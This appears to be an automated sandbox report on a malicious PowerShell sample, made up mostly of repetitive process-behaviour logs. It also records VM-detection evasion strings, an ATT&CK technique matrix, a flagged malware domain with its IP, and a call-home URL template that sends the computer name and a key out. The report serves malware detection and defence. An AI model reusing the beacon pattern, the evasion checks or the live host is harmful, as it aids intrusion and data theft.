Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9942Jump to behavior
Source: powershell.exe, 00000000.00000002.41032039963.0000026E934F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
Source: powershell.exe, 00000000.00000002.41066212714.0000026EAAD8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachineMSFT_MpComputerStatusMSFT_MpComputerStatus
Source: powershell.exe, 00000000.00000002.41066212714.0000026EAAD8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <!-- IFRpbWUtU3RhbXAgUENBIDIwMTAwDQYJKoZIhvcNAQEFBQACBQDk2nlVMCIYDzIw -->
Source: powershell.exe, 00000000.00000002.41066212714.0000026EAAC2D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.41068311710.0000026EAB054000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.41032039963.0000026E934F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.41066212714.0000026EAAC2D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.41068311710.0000026EAB054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: booleanIsVirtualMachine
Source: powershell.exe, 00000000.00000002.41068311710.0000026EAB054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000000.00000002.41032039963.0000026E934F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Windows Management Instrumentation
1
DLL Side-Loading
1
Process Injection
1
Virtualization/Sandbox Evasion
OS Credential Dumping21
Security Software Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell
Boot or Logon Initialization Scripts1
DLL Side-Loading
1
Process Injection
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information
Security Account Manager1
Process Discovery
SMB/Windows Admin SharesData from Network Shared Drive1
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS1
Application Window Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
download.ps18%VirustotalBrowse
download.ps13%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://pesterbdd.com/images/Pester.pngXz0%Avira URL Cloudsafe
http://pesterbdd.com/images/Pester.png0%Avira URL Cloudsafe
http://$jp1hlsae28owqrv/$nkg635ix9hrwbzc.php?0%Avira URL Cloudsafe
https://go.micro0%Avira URL Cloudsafe
http://crl.micr0%Avira URL Cloudsafe
http://$jp1hlsae28owqrv/$nkg635ix9hrwbzc.php?id=$env:computername&key=$ijkcxgoqtupsma&s=5270%Avira URL Cloudsafe
http://cmacnnkfbhlcncm.top100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
cmacnnkfbhlcncm.top
45.61.136.138
truefalse
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.41058553820.0000026EA2994000.00000004.00000800.00020000.00000000.sdmpfalse
      high
      http://www.apache.org/licenses/LICENSE-2.0.htmlXzpowershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmpfalse
        high
        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmpfalse
          high
          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            https://go.micropowershell.exe, 00000000.00000002.41032039963.0000026E94AEA000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://contoso.com/powershell.exe, 00000000.00000002.41058553820.0000026EA2994000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.41058553820.0000026EA2994000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://contoso.com/Licensepowershell.exe, 00000000.00000002.41058553820.0000026EA2994000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://contoso.com/Iconpowershell.exe, 00000000.00000002.41058553820.0000026EA2994000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://www.quovadis.bm0powershell.exe, 00000000.00000002.41064416025.0000026EAA920000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://github.com/Pester/PesterXzpowershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://$jp1hlsae28owqrv/$nkg635ix9hrwbzc.php?id=$env:computername&key=$ijkcxgoqtupsma&s=527powershell.exe, 00000000.00000002.41032039963.0000026E93B0F000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://$jp1hlsae28owqrv/$nkg635ix9hrwbzc.php?powershell.exe, 00000000.00000002.41032039963.0000026E93B0F000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://cmacnnkfbhlcncm.toppowershell.exe, 00000000.00000002.41032039963.0000026E93A8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.41032039963.0000026E934F7000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          https://aka.ms/pscore68powershell.exe, 00000000.00000002.41032039963.0000026E92921000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://ocsp.quovadisoffshore.com0powershell.exe, 00000000.00000002.41064416025.0000026EAA920000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://crl.micrpowershell.exe, 00000000.00000002.41065685822.0000026EAAA40000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.41032039963.0000026E92921000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://pesterbdd.com/images/Pester.pngXzpowershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  No contacted IP infos
                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1578248
                                  Start date and time:2024-12-19 13:33:06 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 6m 1s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                  Run name:Suspected VM Detection
                                  Number of analysed new started processes analysed:4
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:download.ps1
                                  Detection:MAL
                                  Classification:mal68.evad.winPS1@2/7@2/0
                                  EGA Information:Failed
                                  HCA Information:
                                  • Successful, ratio: 93%
                                  • Number of executed functions: 15
                                  • Number of non-executed functions: 0
                                  Cookbook Comments:
                                  • Found application associated with file extension: .ps1
                                  • Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe
                                  • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                  • Execution Graph export aborted for target powershell.exe, PID 7452 because it is empty
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtCreateKey calls found.
                                  TimeTypeDescription
                                  07:35:13API Interceptor26x Sleep call for process: powershell.exe modified
                                  13:34:59Task SchedulerRun new task: {3B6AD319-1AFD-4CDE-8E47-6C796A4288D1} path: .
                                  No context
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  cmacnnkfbhlcncm.topdownload.ps1Get hashmaliciousUnknownBrowse
                                  • 45.61.136.138
                                  download.ps1Get hashmaliciousUnknownBrowse
                                  • 45.61.136.138
                                  download.ps1Get hashmaliciousUnknownBrowse
                                  • 45.61.136.138
                                  download.ps1Get hashmaliciousUnknownBrowse
                                  • 45.61.136.138
                                  download.ps1Get hashmaliciousUnknownBrowse
                                  • 45.61.136.138
                                  download.ps1Get hashmaliciousUnknownBrowse
                                  • 45.61.136.138
                                  No context
                                  No context
                                  No context
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):64
                                  Entropy (8bit):0.34726597513537405
                                  Encrypted:false
                                  SSDEEP:3:Nlll:Nll
                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
